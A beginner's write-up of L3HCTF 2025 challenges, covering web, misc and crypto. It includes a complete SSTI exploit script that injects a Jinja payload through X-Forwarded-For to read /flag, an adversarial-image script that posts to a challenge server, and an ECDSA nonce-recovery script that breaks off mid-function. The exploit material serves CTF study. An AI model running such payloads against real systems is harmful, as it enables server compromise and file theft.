L3HCTF 2025

A writeup aimed at beginners like me.

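I didn't actually solve a single challenge, but reading other people's writeups is still well worth it to broaden my thinking and knowledge, and to see what good tools are out there.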

What follows is my exploration of each challenge, within the limits of my own knowledge.

References:

https://su-team.cn/posts/e3fd1be7.html

https://blog.xmcve.com/2025/07/15/L3HCTF2025-Writeup/#title-6

学习黑客, "5分钟深入浅出理解Alternate Data Streams (ADS)" (Understanding Alternate Data Streams (ADS) in 5 minutes)

https://www.cnblogs.com/Mirai-haN/articles/18982146

Web

赛博侦探 (Cyber Detective)



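The key to this challenge is the `fromurl` parameter on a page redirect. I missed it, went in the wrong direction, and spent the rest of my time guessing blindly.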

After clicking the 九龙夺嫡 video link, you will notice that `fromurl` is a link to http://xxx/secret/find_my_passwd



Following that link opens a password-recovery page that asks a series of questions about the target:

First, the email address, which can be found in the published documents.

Next, the latitude and longitude of the shop.

Plotting the clues on a map narrows down the approximate area.



Then the hometown: the barcode on the plane ticket can be decoded with https://online-barcode-reader.inliteresearch.com/, which gives:

M1LELAND ABCDEFG WUHFOCMU 5399 185L045A0002 100

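Looking up the airport codes in this string (WUH to FOC, i.e. Wuhan to Fuzhou) points to Fuzhou as the hometown.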
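The decoded text follows the IATA BCBP (bar-coded boarding pass) layout: after the `M` format code and leg count come the passenger name, PNR, origin airport, destination airport, carrier, flight number, Julian date, cabin and seat. The printout above has its padding spaces collapsed, so a strict fixed-width parser would not line up. The sketch below is a tolerant regex written for this one string (assuming a two-letter carrier code); `parse_boarding_pass` and the tiny `AIRPORTS` table are hypothetical helpers, not a full BCBP implementation.

```python
import re

# Tolerant pattern for the collapsed-whitespace printout above (assumption:
# two-letter carrier code, single leg). Not a full IATA BCBP parser.
BCBP_RE = re.compile(
    r"^M(?P<legs>\d)(?P<name>\S+)\s+(?P<pnr>\S+)\s+"
    r"(?P<origin>[A-Z]{3})(?P<dest>[A-Z]{3})(?P<carrier>[A-Z0-9]{2})\s*"
    r"(?P<flight>\d{1,5})\s+(?P<julian_day>\d{3})(?P<cabin>[A-Z])(?P<seat>\d{3}[A-Z])"
)

# Only the two airport codes that appear in this challenge.
AIRPORTS = {"WUH": "Wuhan", "FOC": "Fuzhou"}


def parse_boarding_pass(text):
    """Return the leading mandatory fields as a dict of strings."""
    m = BCBP_RE.match(text)
    if m is None:
        raise ValueError("not a recognised boarding-pass string")
    return m.groupdict()


info = parse_boarding_pass("M1LELAND ABCDEFG WUHFOCMU 5399 185L045A0002 100")
print(info["origin"], "->", info["dest"])                      # WUH -> FOC
print(AIRPORTS[info["origin"]], "->", AIRPORTS[info["dest"]])  # Wuhan -> Fuzhou
```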

The English name is simply the prefix (local part) of the email address.

Submitting the answers redirects to a new page, and its page source suggests an arbitrary file read.

Then just use the arbitrary file read to read the flag.

best_profile

The source code is provided for this challenge.



The file structure is shown in the figure above.

Architecture overview

Container setup:

OpenResty (Nginx) serves as the front-end server

Python Flask is the back-end application (listening on port 5000)

The Nginx configuration reverse-proxies all requests to the Flask app

Routing flow



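Client → Nginx (port 80) → Flask (port 5000)

Auditing the code shows that the other features are boilerplate; the key parts are these two routes, and specifically how they handle `last_ip`.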

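SSTI (server-side template injection) occurs when an application renders user input with a template engine without properly filtering it, letting an attacker inject malicious template code that is executed on the server.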

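Here the template is built by plain string concatenation: an f-string splices the user-controlled `last_ip` and `country` variables directly into the template source, which is a textbook SSTI.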
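To make the difference concrete, here is a minimal sketch using Jinja2 directly (Flask's `render_template_string` is built on Jinja2). The function names are hypothetical and this is not the challenge's actual code: when user data becomes part of the template source, `{{ ... }}` inside it is evaluated; when it is passed as a context variable, it is only printed as text.

```python
from jinja2 import Environment

env = Environment()  # default Jinja2 environment (autoescape off)


def render_vulnerable(last_ip, country):
    # User data is spliced into the template *source*, so any {{ ... }} in it is evaluated.
    source = f"<p>Last IP: {last_ip}</p><p>Country: {country}</p>"
    return env.from_string(source).render()


def render_safe(last_ip, country):
    # User data is passed as context variables and is only ever output as text.
    source = "<p>Last IP: {{ last_ip }}</p><p>Country: {{ country }}</p>"
    return env.from_string(source).render(last_ip=last_ip, country=country)


payload = "{{ 7*7 }}"
print(render_vulnerable(payload, "CN"))  # <p>Last IP: 49</p><p>Country: CN</p>
print(render_safe(payload, "CN"))        # <p>Last IP: {{ 7*7 }}</p><p>Country: CN</p>
```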

After registering an account and visiting it, the displayed last IP is 127.0.0.1, and visiting `ip_detail` says you must log in first.



Every request updates `last_ip`, and all requests, including images and other static resources, are proxied to the Flask app (127.0.0.1:5000), so the recorded `last_ip` is always 127.0.0.1.

As for the "not logged in" message: it comes from `res = requests.get(f"http://127.0.0.1/get_last_ip/{username}")`. This internal HTTP request does not carry the user's login state (session cookie), so Flask treats it as unauthenticated.

So we need to get the response carrying our injected value cached, so that the internal request can still retrieve the IP.
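A toy model of why the caching trick helps. This is an illustration under an assumption, not the challenge's real proxy configuration (which this writeup does not reproduce): suppose the front end caches responses whose path ends in a static-file extension, keyed by path alone and ignoring cookies. Then a logged-in request for `/get_last_ip/<name>.png` fills the cache, and the later cookie-less internal request for the same path is answered from it. `ToyCachingProxy` and `fake_flask` are hypothetical names.

```python
# Toy model only. Assumption: paths ending in a static extension are cached
# by path alone, without looking at cookies.
STATIC_EXTS = (".png", ".jpg", ".css", ".js")


def fake_flask(path, cookie):
    """Stand-in back end: only a logged-in request sees the stored last_ip."""
    if cookie is None:
        return "please log in first"
    return "last_ip = {{ payload }}"


class ToyCachingProxy:
    def __init__(self, backend):
        self.backend = backend
        self.cache = {}

    def get(self, path, cookie=None):
        if path in self.cache:  # cache hit: the cookie is never consulted
            return self.cache[path]
        body = self.backend(path, cookie)
        if path.endswith(STATIC_EXTS):
            self.cache[path] = body
        return body


proxy = ToyCachingProxy(fake_flask)
# 1. The attacker, logged in, requests their own .png-suffixed username first.
proxy.get("/get_last_ip/abc123.png", cookie="session=attacker")
# 2. The internal, cookie-less request for the same path gets the cached body.
print(proxy.get("/get_last_ip/abc123.png"))  # last_ip = {{ payload }}
# Without the .png suffix nothing is cached, so the internal request fails.
proxy.get("/get_last_ip/abc123", cookie="session=attacker")
print(proxy.get("/get_last_ip/abc123"))      # please log in first
```

This matches the order of requests in the exp: log in with the payload, fetch `/get_last_ip/{username}` while logged in, then hit `/ip_detail/{username}`.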

As for the flag path, the source shows it is `/flag`.

Borrowed exp:

```python
import random
import string

import requests


def generate_random_png_username(length=8):
    """Generate a random username (random string + '.png')."""
    random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
    return f"{random_str}.png"


def exploit():
    base_url = "http://your_IP"  # placeholder: replace with the challenge address
    username = generate_random_png_username()  # random username ending in .png
    password = "hacked_password"  # fixed password (same as the original script)
    session = requests.Session()  # keeps the login cookie between requests

    # A more reliable SSTI payload that reads the file directly:
    # - Flask's `lipsum` global gives access to Python's builtins
    # - "/flag" is built from ASCII codes (47=/, 102=f, 108=l, 97=a, 103=g)
    # - the result is open("/flag").read()
    ssti_payload = (
        "{% set chr=lipsum.__globals__.__builtins__.chr %}"
        "{{ lipsum.__globals__.__builtins__.open(chr(47)+chr(102)+chr(108)+chr(97)+chr(103)).read() }}"
    )
    headers = {"X-Forwarded-For": ssti_payload}

    # 1. Register the user
    print(f"[+] Registering user: {username}")
    register_data = {
        "username": username,
        "password": password,
        "bio": "SSTI Attack Demo",
        "submit": "Sign Up",
    }
    register_response = session.post(f"{base_url}/register", data=register_data)
    print(register_response.text)

    # 2. Log in, injecting the SSTI payload through X-Forwarded-For
    print("\n[+] Logging in and injecting SSTI")
    login_data = {
        "username": username,
        "password": password,
        "submit": "Log In",
    }
    login_response = session.post(f"{base_url}/login", headers=headers, data=login_data)
    print(login_response.text)

    # 3. Trigger the SSTI
    print("\n[+] Triggering SSTI")
    routes = [
        f"/get_last_ip/{username}",
        f"/ip_detail/{username}",
    ]
    for route in routes:
        print(f"\nAccessing {route}:")
        response = session.get(f"{base_url}{route}")
        print(response.text)


if __name__ == "__main__":
    exploit()
```

Main ideas:

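Use a username ending in `.png` to bypass the file-type check

Use `requests.Session` to keep the login state

Inject through the `X-Forwarded-For` header rather than a form field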

gateway_advance

```nginx
worker_processes 1;

events {
    use epoll;
    worker_connections 10240;
}

http {
    include mime.types;
    default_type text/html;
    access_log off;
    error_log /dev/null;
    sendfile on;

    init_by_lua_block {
        f = io.open("/flag", "r")
        f2 = io.open("/password", "r")
        flag = f:read("*all")
        password = f2:read("*all")
        f:close()
        password = string.gsub(password, "[\n\r]", "")
        os.remove("/flag")
        os.remove("/password")
    }

    server {
        listen 80 default_server;

        location / {
            content_by_lua_block {
                ngx.say("hello, world!")
            }
        }

        location /static {
            alias /www/;
            access_by_lua_block {
                if ngx.var.remote_addr ~= "127.0.0.1" then
                    ngx.exit(403)
                end
            }
            add_header Accept-Ranges bytes;
        }

        location /download {
            access_by_lua_block {
                local blacklist = {"%.", "/", ";", "flag", "proc"}
                local args = ngx.req.get_uri_args()
                for k, v in pairs(args) do
                    for _, b in ipairs(blacklist) do
                        if string.find(v, b) then
                            ngx.exit(403)
                        end
                    end
                end
            }
            add_header Content-Disposition "attachment; filename=download.txt";
            proxy_pass http://127.0.0.1/static$arg_filename;
            body_filter_by_lua_block {
                local blacklist = {"flag", "l3hsec", "l3hctf", "password", "secret", "confidential"}
                for _, b in ipairs(blacklist) do
                    if string.find(ngx.arg[1], b) then
                        ngx.arg[1] = string.rep("*", string.len(ngx.arg[1]))
                    end
                end
            }
        }

        location /read_anywhere {
            access_by_lua_block {
                if ngx.var.http_x_gateway_password ~= password then
                    ngx.say("go find the password first!")
                    ngx.exit(403)
                end
            }
            content_by_lua_block {
                local f = io.open(ngx.var.http_x_gateway_filename, "r")
                if not f then
                    ngx.exit(404)
                end
                local start = tonumber(ngx.var.http_x_gateway_start) or 0
                local length = tonumber(ngx.var.http_x_gateway_length) or 1024
                if length > 1024 * 1024 then
                    length = 1024 * 1024
                end
                f:seek("set", start)
                local content = f:read(length)
                f:close()
                ngx.say(content)
                ngx.header["Content-Type"] = "application/octet-stream"
            }
        }
    }
}
```

This configuration has several key security points:

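On startup it reads and then deletes `/flag` and `/password`, keeping their contents in memory (only `f` is closed; the handle `f2` to `/password` is never closed)

`/static` only allows local access

`/download` strictly filters both its query parameters and the response body

`/read_anywhere` offers arbitrary file reads, but only with the correct password header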
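Since `f2` is never closed, the deleted `/password` probably remains reachable through an open file descriptor of the nginx processes (workers are forked from the master that ran `init_by_lua_block`, so they inherit it). The Linux-only sketch below shows that general mechanism with a temporary file. It is not a solution to this challenge; note that `/download` blocks the literal string `proc`. `demo_deleted_but_open` is a hypothetical helper.

```python
import os
import tempfile


def demo_deleted_but_open(secret=b"s3cret-password\n"):
    """Linux-only: write a file, keep a handle open, delete it, read it via /proc."""
    fd, path = tempfile.mkstemp()
    os.write(fd, secret)
    os.close(fd)
    handle = open(path, "rb")  # plays the role of f2 = io.open("/password")
    try:
        os.remove(path)  # plays the role of os.remove("/password")
        still_listed = os.path.exists(path)  # False: the directory entry is gone
        link = f"/proc/self/fd/{handle.fileno()}"
        target = os.readlink(link)  # the old path followed by " (deleted)"
        with open(link, "rb") as again:  # the data is still reachable via the fd
            data = again.read()
    finally:
        handle.close()
    return still_listed, target, data


if __name__ == "__main__":
    print(demo_deleted_but_open())
```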

Misc



量子双生影 (Quantum Twin Shadows)

Open it with 7-Zip:



This is steganography via NTFS data streams; exporting with NtfsStreamsEditor2 also recovers the hidden files.





After extracting the two files, XOR them together in Stegsolve to get something that looks like a QR code.

Scanning it gives the flag.
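The XOR step can also be reproduced outside Stegsolve (its Image Combiner offers XOR). A minimal sketch with Pillow and NumPy, assuming the two extracted files are same-sized images; `xor_images` is a hypothetical helper:

```python
import numpy as np
from PIL import Image


def xor_images(img_a, img_b):
    """Pixel-wise XOR of two same-sized images, per RGB channel."""
    a = np.asarray(img_a.convert("RGB"), dtype=np.uint8)
    b = np.asarray(img_b.convert("RGB"), dtype=np.uint8)
    if a.shape != b.shape:
        raise ValueError(f"size mismatch: {a.shape} vs {b.shape}")
    return Image.fromarray(np.bitwise_xor(a, b))
```

Usage, with hypothetical file names: `xor_images(Image.open("stream1.png"), Image.open("stream2.png")).save("xor.png")`, then scan `xor.png`.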

An explanation of the principle and approach:

Alternate Data Streams (ADS)

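Alternate Data Streams (ADS) are a feature of the NTFS file system that lets a single file contain multiple streams of data. When you open a file normally, what you see is its main data stream (also called the unnamed or default stream). But a file can also have any number of additional named streams, each holding completely different content.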

Basic concept of ADS

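```text
File
├── Main data stream (default, unnamed)
│   └── the file content you normally see
└── Alternate data streams (any number)
    ├── stream1 - hidden content 1
    ├── stream2 - hidden content 2
    └── streamN - hidden content N
```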

Writing a data stream into a file:

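```bat
echo "Baolimo" > 001.txt:hidden.txt
rem General form: echo "hidden content" > host_file:stream_name
```

This challenge is easy once you find the right approach; the file name itself hints that it is data-stream steganography.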
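The same `host:stream` path syntax also works from Python on Windows, so hidden streams can be read back without extra tools once you know their names. A minimal sketch; `write_stream` and `read_stream` are hypothetical helpers. On an NTFS volume the data goes into a named stream of the host file; on other file systems the colon is just part of an ordinary file name, so there the sketch simply creates a second file.

```python
def write_stream(host, stream, data):
    # On NTFS, "host:stream" addresses a named alternate data stream of `host`.
    with open(f"{host}:{stream}", "w", encoding="utf-8") as f:
        f.write(data)


def read_stream(host, stream):
    # Reads the named stream; the host file's normal content is untouched.
    with open(f"{host}:{stream}", encoding="utf-8") as f:
        return f.read()
```

For example, `read_stream("001.txt", "hidden.txt")` returns `Baolimo` after the `echo` command above has been run on NTFS.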

Why not read it out?

Opening the file in a hex viewer shows it is a JPG; extracting its strings with `strings` reveals a reversed Base64 string at the end.

Reversing it gives: aDFudDogSUdOIFJldmlldw==

Base64-decoding that gives: h1nt: IGN Review
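The strings-reverse-decode steps fit in a few lines. A minimal sketch: the function name and the 8-character minimum run length are assumptions, and the sample bytes are a stand-in for the real file (a JPEG-like header and end-of-image marker followed by the reversed string from the challenge).

```python
import base64
import re


def decode_reversed_b64_tail(data: bytes) -> str:
    """Take the last Base64-looking run in `data` (like the tail of `strings`),
    reverse it, and Base64-decode it."""
    runs = re.findall(rb"[A-Za-z0-9+/=]{8,}", data)
    if not runs:
        raise ValueError("no Base64-looking string found")
    return base64.b64decode(runs[-1][::-1]).decode("utf-8")


sample = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\xff\xd9" + b"==wdllmdlJFIOdUSgoDduFDa"
print(decode_reversed_b64_tail(sample))  # h1nt: IGN Review
```

On the real file this would be `decode_reversed_b64_tail(open("challenge.jpg", "rb").read())`, with a hypothetical file name.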

"IGN review" usually refers to a review of a game, film, tech product or other entertainment published by IGN (Imagine Games Network).





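The main difficulty of this challenge is recognizing that the script is the Tunic language, the constructed writing system from the game TUNIC.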

A Google reverse image search identifies it.

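Then, in IGN's TUNIC coverage, I found this article: https://www.ign.com/articles/tunic-review-xbox-pc-steam. The punctuation shows that the first two paragraphs in the image are the Tunic encoding of the article's first two paragraphs, which further confirms that this is the Tunic language.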

Then decode it according to the language's rules.

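However, decoding this way gives pronunciations that don't match, so the phoneme assignments were presumably shuffled. The mapping can be recovered by comparing the glyphs against the known article paragraphs.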

This is tedious, so I only made a token attempt here.
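Recovering a shuffled mapping from known paragraphs is a known-plaintext substitution problem. A minimal sketch, assuming the glyphs have already been transcribed into hypothetical IDs (one per consonant or vowel component) and aligned with the phonemes of the known text; `learn_mapping` and `decode` are illustrative names:

```python
def learn_mapping(aligned_pairs):
    """Build a glyph -> phoneme table from (glyphs, phonemes) pairs of equal length.
    Raises if one glyph is seen with two different phonemes."""
    mapping = {}
    for glyphs, phonemes in aligned_pairs:
        if len(glyphs) != len(phonemes):
            raise ValueError("each glyph sequence needs a phoneme sequence of the same length")
        for g, p in zip(glyphs, phonemes):
            if mapping.setdefault(g, p) != p:
                raise ValueError(f"conflicting phonemes for glyph {g!r}: {mapping[g]!r} vs {p!r}")
    return mapping


def decode(glyphs, mapping):
    """Translate a glyph sequence, leaving '?' for glyphs not learned yet."""
    return [mapping.get(g, "?") for g in glyphs]


# Hypothetical glyph IDs aligned with the known text.
known = [(["G7", "G2", "G9"], ["f", "o", "ks"])]
mapping = learn_mapping(known)
print(decode(["G9", "G2", "G4"], mapping))  # ['ks', 'o', '?']
```

The conflict check is the useful part: a glyph that maps to two different sounds means the alignment is off.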

With the glyph-to-phoneme mapping in hand, decoding the sentences at the bottom gives:

the content of flag is: come on little brave fox

replace lesser o with number zero, letter l with number one

replace lesser a with symbol at

make every lesser e uppercase

use underline to link each word

PaperBack



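Searching the keywords from the challenge hint leads to https://ollydbg.de/Paperbak/. Download the tool from there and scan the challenge image; this yields a .ws file. Copying its contents into CyberChef and converting to hex shows that it consists only of the bytes 0a, 09 and 20.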

Since 0a is the newline character, replace each 0a with a line break.

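The result is very regular: after removing the lone 09s and the leading 20 20 of each line, what remains looks like binary, with 20 as 0 and 09 as 1. A short script does the filtering.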
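A minimal version of that filter. The layout looks like a program in the esoteric Whitespace language (push a number with space-space, sign, bits and LF, then print it with tab-LF-space-space), which would also explain the .ws extension; that reading, the function names, and the sample builder are assumptions for illustration.

```python
def decode_ws_bits(text):
    """Split on LF, drop lone-tab and blank lines, strip the leading two
    spaces, then read space as 0 and tab as 1."""
    chars = []
    for line in text.split("\n"):
        if line == "\t" or line.strip(" ") == "":
            continue  # a lone 09, or an empty / space-only line
        if line.startswith("  "):
            line = line[2:]  # drop the leading "20 20"
        bits = line.replace(" ", "0").replace("\t", "1")
        chars.append(chr(int(bits, 2)))  # leading zeros do not change the value
    return "".join(chars)


def encode_sample(message):
    """Build a Whitespace-style sample: push each character, then print it."""
    out = []
    for ch in message:
        bits = format(ord(ch), "b").replace("0", " ").replace("1", "\t")
        out.append("   " + bits + "\n" + "\t\n  ")
    return "".join(out) + "\n\n\n"


print(decode_ws_bits(encode_sample("L3")))  # L3
```

On the real file this would be `decode_ws_bits(open("out.ws").read())`, with a hypothetical file name.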

Converting the binary to characters gives L3HCTF{welcome_to_l3hctf2025}

Please Sign In

```python
import uvicorn
import torch
import json
import os
from fastapi import FastAPI, File, UploadFile
from PIL import Image
from torchvision import transforms
from torchvision.models import shufflenet_v2_x1_0, ShuffleNet_V2_X1_0_Weights

feature_extractor = shufflenet_v2_x1_0(weights=ShuffleNet_V2_X1_0_Weights.IMAGENET1K_V1)
feature_extractor.fc = torch.nn.Identity()
feature_extractor.eval()
weights = ShuffleNet_V2_X1_0_Weights.IMAGENET1K_V1
transform = transforms.Compose([
    transforms.ToTensor(),
])

if not os.path.exists("embedding.json"):
    user_image = Image.open("user_image.jpg").convert("RGB")
    user_image = transform(user_image).unsqueeze(0)
    with torch.no_grad():
        user_embedding = feature_extractor(user_image)[0]
    with open("embedding.json", "w") as f:
        json.dump(user_embedding.tolist(), f)

user_embedding = json.load(open("embedding.json", "r"))
user_embedding = torch.tensor(user_embedding, dtype=torch.float32)
user_embedding = user_embedding.unsqueeze(0)

app = FastAPI()


@app.post("/signin/")
async def signin(file: UploadFile = File(...)):
    submit_image = Image.open(file.file).convert("RGB")
    submit_image = transform(submit_image).unsqueeze(0)
    with torch.no_grad():
        submit_embedding = feature_extractor(submit_image)[0]
    diff = torch.mean((user_embedding - submit_embedding) ** 2)
    result = {
        "status": "L3HCTF{test_flag}" if diff.item() < 5e-6 else "failure"
    }
    return result


@app.get("/")
async def root():
    return {"message": "Welcome to the Face Recognition API!"}


if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8000)
```

The server extracts features from `user_image.jpg` and saves them to `embedding.json`. When a user uploads an image, its feature vector is extracted and compared with the stored one; if the MSE is below 5e-6, the flag is returned.

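The exp below was generated with GPT. One pitfall: GPT initially assumed that the server's feature extractor applies the standard ImageNet normalization, but here it does not (the transform is only `ToTensor()`).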
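The upload format matters as well. The threshold (MSE < 5e-6) is tiny and the optimized image is noise-like, so lossy JPEG re-encoding, which the optimization script's in-loop upload uses, may plausibly push the embedding past it, while PNG preserves the saved 8-bit pixels exactly. A quick way to check this locally; the helper names are hypothetical and random noise stands in for the optimized image:

```python
import io

import numpy as np
from PIL import Image


def roundtrip(img, fmt):
    """Encode `img` in memory as `fmt` and decode it again, as an upload would."""
    buf = io.BytesIO()
    img.save(buf, format=fmt)
    buf.seek(0)
    return Image.open(buf).convert("RGB")


def max_pixel_error(a, b):
    """Largest absolute per-channel difference, on the 0-255 scale."""
    x = np.asarray(a, dtype=np.int16)
    y = np.asarray(b, dtype=np.int16)
    return int(np.abs(x - y).max())


rng = np.random.default_rng(0)
noise = Image.fromarray(rng.integers(0, 256, size=(64, 64, 3), dtype=np.uint8))
print("PNG :", max_pixel_error(noise, roundtrip(noise, "PNG")))   # 0
print("JPEG:", max_pixel_error(noise, roundtrip(noise, "JPEG")))  # greater than 0
```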

Generating a matching image

```python
import torch
import torch.optim as optim
from torchvision.models import shufflenet_v2_x1_0, ShuffleNet_V2_X1_0_Weights
from PIL import Image
import json
import io
import requests

# --- Configuration ---
SERVER_URL = "http://1.95.8.146:50001/signin/"
EMBEDDING_FILE = "embedding.json"
OUTPUT_IMAGE_PATH = "optimized_image.png"
LEARNING_RATE = 0.1  # This higher LR works well with sigmoid and fewer steps
NUM_ITERATIONS = 1000  # Fewer iterations are often enough with this approach
LOSS_THRESHOLD = 1e-7  # Aim for an even lower loss to overcome minor server-side precision
SAVE_INTERVAL = 50  # Save optimized image every X iterations

# --- Setup Model ---
# We still load ImageNet weights to get the pre-trained ShuffleNet model,
# but we will NOT use its specific normalization transforms.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(f"Using device: {device}")
feature_extractor = shufflenet_v2_x1_0(weights=ShuffleNet_V2_X1_0_Weights.IMAGENET1K_V1)
feature_extractor.fc = torch.nn.Identity()  # Remove the classification head
feature_extractor.eval()  # Set model to evaluation mode
feature_extractor.to(device)

# --- Load Target Embedding ---
try:
    with open(EMBEDDING_FILE, "r") as f:
        user_embedding_list = json.load(f)
    user_embedding = torch.tensor(user_embedding_list, dtype=torch.float32).unsqueeze(0).to(device)
    print("Target embedding loaded successfully.")
except FileNotFoundError:
    print(f"Error: {EMBEDDING_FILE} not found. Make sure it's in the same directory.")
    exit()
except Exception as e:
    print(f"Error loading target embedding: {e}")
    exit()

# --- Initialize Image for Optimization ---
image_size = (224, 224)
# Initialize with random values, we'll use sigmoid to bring them to 0-1
optimized_image_tensor = torch.randn(1, 3, image_size[0], image_size[1], device=device, requires_grad=True)
optimizer = optim.Adam([optimized_image_tensor], lr=LEARNING_RATE)
print("Starting image optimization...")

# --- Optimization Loop ---
for i in range(NUM_ITERATIONS):
    optimizer.zero_grad()
    # Apply sigmoid to constrain pixel values to [0, 1] in a differentiable way.
    # This is critical for robust optimization without hard clamping.
    image_for_model = optimized_image_tensor.sigmoid()
    # Embedding of the current image *without* ImageNet normalization; keep the
    # batch dimension so its shape (1, 1024) matches user_embedding.
    current_embedding = feature_extractor(image_for_model)
    # Calculate the mean squared difference (loss)
    loss = torch.nn.functional.mse_loss(current_embedding, user_embedding)
    loss.backward()
    optimizer.step()

    if (i + 1) % SAVE_INTERVAL == 0 or loss.item() < LOSS_THRESHOLD:
        print(f"Iteration {i + 1}/{NUM_ITERATIONS}, Current Loss: {loss.item():.10f}, "
              f"LR: {optimizer.param_groups[0]['lr']:.8f}")
        # Convert the [0, 1] tensor to a PIL Image for saving:
        # permute (C, H, W) -> (H, W, C), scale to 0-255 and cast to uint8
        pil_image = Image.fromarray(
            (image_for_model.detach().squeeze().permute(1, 2, 0).cpu().numpy() * 255).astype('uint8'))
        pil_image.save(OUTPUT_IMAGE_PATH)

        # If loss is below threshold, attempt to sign in
        if loss.item() < LOSS_THRESHOLD:
            print(f"\nLoss {loss.item():.10f} is below threshold {LOSS_THRESHOLD}.")
            print("Attempting to sign in with the optimized image...")
            try:
                img_byte_arr = io.BytesIO()
                # Save as JPEG (or PNG if server expects it for better quality)
                pil_image.save(img_byte_arr, format='JPEG')  # Try 'PNG' if JPEG fails
                img_byte_arr.seek(0)
                # Send the file to the server
                files = {'file': ('optimized_image.jpg', img_byte_arr, 'image/jpeg')}  # Adjust mimetype for PNG
                response = requests.post(SERVER_URL, files=files)
                print("Server response:")
                server_response = response.json()
                print(server_response)
                # The real server returns the flag itself as "status", so anything
                # other than "failure" means success.
                if server_response.get("status", "failure") != "failure":
                    print("\n*** Successfully obtained the flag! ***")
                    break  # Stop optimization if flag is found
            except requests.exceptions.ConnectionError:
                print(f"Error: Could not connect to the server at {SERVER_URL}. Is it running?")
            except json.JSONDecodeError:
                print(f"Error: Could not decode JSON from server response. Raw text: {response.text}")
            except Exception as e:
                print(f"An unexpected error occurred during server communication: {e}")

print("\nOptimization finished.")
# Save the final optimized image
final_pil_image = Image.fromarray(
    (optimized_image_tensor.sigmoid().detach().squeeze().permute(1, 2, 0).cpu().numpy() * 255).astype('uint8'))
final_pil_image.save("final_optimized_image.png")
print("Final optimized image saved to final_optimized_image.png")
```

Sending the image

```python
import os

import requests


def upload_and_print_response(image_path, server_url):
    if not os.path.exists(image_path):
        print(f"File '{image_path}' not found.")
        return
    with open(image_path, 'rb') as f:
        files = {'file': f}
        response = requests.post(server_url, files=files)
    try:
        print("Server response:", response.json())
    except ValueError:
        print("Server response (text):", response.text)


if __name__ == "__main__":
    OUT_IMG = 'final_optimized_image.png'
    SIGNIN_URL = 'http://1.95.8.146:50001/signin/'
    # Step 2: Upload the optimized image and print the flag or failure
    upload_and_print_response(OUT_IMG, SIGNIN_URL)
```

Crypto

Crypto isn't my main area, so for this part I mostly just ran things through GPT.



EzECDSA

Later, Gemini + Colab + SageCell solved it in one go.
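My reading of the script below, inferred from the code rather than stated in the original solution: each signature makes the nonce a linear function of the private key $d$, and the polynomial the script builds is what you get by eliminating the unknowns $a, b, c$ of a quadratic nonce recurrence $k_{i+1} = a k_i^2 + b k_i + c \pmod n$ over five consecutive signatures:

$$
\begin{aligned}
k_i &\equiv s_i^{-1}(h_i + r_i d) = M_i + N_i d \pmod n, \qquad M_i = h_i s_i^{-1},\; N_i = r_i s_i^{-1} \\
Y_i &= \frac{k_{i+1} - k_{i+2}}{k_i - k_{i+1}} = a(k_i + k_{i+1}) + b \\
Y_0 - Y_1 &= a(k_0 - k_2), \qquad Y_1 - Y_2 = a(k_1 - k_3) \\
(Y_0 - Y_1)(k_1 - k_3) &= (Y_1 - Y_2)(k_0 - k_2)
\end{aligned}
$$

Clearing the denominators of $Y_0, Y_1, Y_2$ turns the last line into a polynomial in $d$ alone (`result_poly` in `calculate_poly_for_d`), so its roots modulo $n$ are the candidate private keys.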

```python
from ecdsa import NIST256p
from gmpy2 import invert

curve = NIST256p
n = curve.order

signatures_raw = """
h: 5832921593739954772384341732387581797486339670895875430934592373351528180781, r: 78576287416983546819312440403592484606132915965726128924031253623117138586396, s: 108582979377193966287732302562639670357586761346333866965382465209612237330851
h: 85517239535736342992982496475440962888226294744294285419613128065975843025446, r: 60425040031360920373082268221766168683222476464343035165195057634060216692194, s: 27924509924269609509672965613674355269361001011362007412205784446375567959036
h: 90905761421138489726836357279787648991884324454425734512085180879013704399530, r: 75779605492148881737630918749717271960050893072832415117470852442721700807111, s: 72740499400319841565890543635298470075267336863033867770902108413176557795256
h: 103266614372002123398101167242562044737358751274736728792365384600377408313142, r: 89519601474973769723244654516140957004170211982048028366151899055366457476708, s: 23639647021855356876198750083669161995553646511611903128486429649329358343588
h: 9903460667647154866199928325987868915846235162578615698288214703794150057571, r: 17829304522948160053211214227664982869100868125268116260967204562276608388692, s: 74400189461172040580877095515356365992183768921088660926738652857846750009205
h: 54539896686295066164943194401294833445622227965487949234393615233511802974126, r: 66428683990399093855578572760918582937085121375887639383221629490465838706027, s: 25418035697368269779911580792368595733749376383350120613502399678197333473802
"""

parsed_signatures = []
for line in signatures_raw.strip().split('\n'):
    parts = line.split(', ')
    h = int(parts[0].split(': ')[1])
    r = int(parts[1].split(': ')[1])
    s = int(parts[2].split(': ')[1])
    parsed_signatures.append({'h': h, 'r': r, 's': s})

for sig in parsed_signatures:
    sig['s_inv'] = invert(sig['s'], n)

# k_i = M_i + N_i * d (mod n)
k_coeffs = []
for sig in parsed_signatures:
    M_i = (sig['h'] * sig['s_inv']) % n
    N_i = (sig['r'] * sig['s_inv']) % n
    k_coeffs.append({'M': M_i, 'N': N_i})

# Polynomials in d are coefficient lists, lowest degree first.
def poly_add(p1, p2, modulus):
    result = [0] * max(len(p1), len(p2))
    for i in range(len(result)):
        val1 = p1[i] if i < len(p1) else 0
        val2 = p2[i] if i < len(p2) else 0
        result[i] = (val1 + val2) % modulus
    return result

def poly_sub(p1, p2, modulus):
    result = [0] * max(len(p1), len(p2))
    for i in range(len(result)):
        val1 = p1[i] if i < len(p1) else 0
        val2 = p2[i] if i < len(p2) else 0
        result[i] = (val1 - val2) % modulus
        if result[i] < 0:
            result[i] += modulus
    while len(result) > 1 and result[-1] == 0:
        result.pop()
    return result

def poly_mul(p1, p2, modulus):
    result = [0] * (len(p1) + len(p2) - 1)
    for i in range(len(p1)):
        for j in range(len(p2)):
            result[i + j] = (result[i + j] + p1[i] * p2[j]) % modulus
    while len(result) > 1 and result[-1] == 0:
        result.pop()
    return result

def get_linear_poly(M, N):
    return [M, N]  # M + N*d

def calculate_poly_for_d(idx_offset):
    def get_diff_poly(idx_A, idx_B):
        # k_A - k_B as a polynomial in d
        return poly_sub(get_linear_poly(k_coeffs[idx_A]['M'], k_coeffs[idx_A]['N']),
                        get_linear_poly(k_coeffs[idx_B]['M'], k_coeffs[idx_B]['N']), n)

    # Y_j = (k_{j+1} - k_{j+2}) / (k_j - k_{j+1}), kept as numerator / denominator
    Y_num_0 = get_diff_poly(idx_offset + 1, idx_offset + 2)
    Y_num_1 = get_diff_poly(idx_offset + 2, idx_offset + 3)
